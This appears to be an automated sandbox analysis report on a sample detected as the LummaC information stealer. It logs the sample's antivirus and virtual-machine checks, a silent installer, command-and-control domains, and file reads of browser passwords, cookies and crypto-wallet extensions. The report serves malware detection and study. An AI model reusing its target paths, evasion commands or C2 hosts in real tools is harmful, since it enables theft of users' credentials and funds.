Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: qnUFsmyxMm.exe, 00000000.00000003.3826295678.0000000003403000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

Code function: 0_2_007CB5B0 LdrInitializeThunk,

0_2_007CB5B0

Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

Code function: 0_2_00B1D350 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00B1D350

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat
Source: qnUFsmyxMm.exe, 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: leeryspcieu.click

Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe "C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d5f90697 VolumeInformation

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

Code function: 0_2_00B1DA50 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00B1DA50

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: qnUFsmyxMm.exe, 00000000.00000003.3872774190.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: qnUFsmyxMm.exe PID: 6464, type: MEMORYSTR
Source: Yara match	File source: 0.2.qnUFsmyxMm.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3979712058.00000000006F2000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: qnUFsmyxMm.exe, 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""]x

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
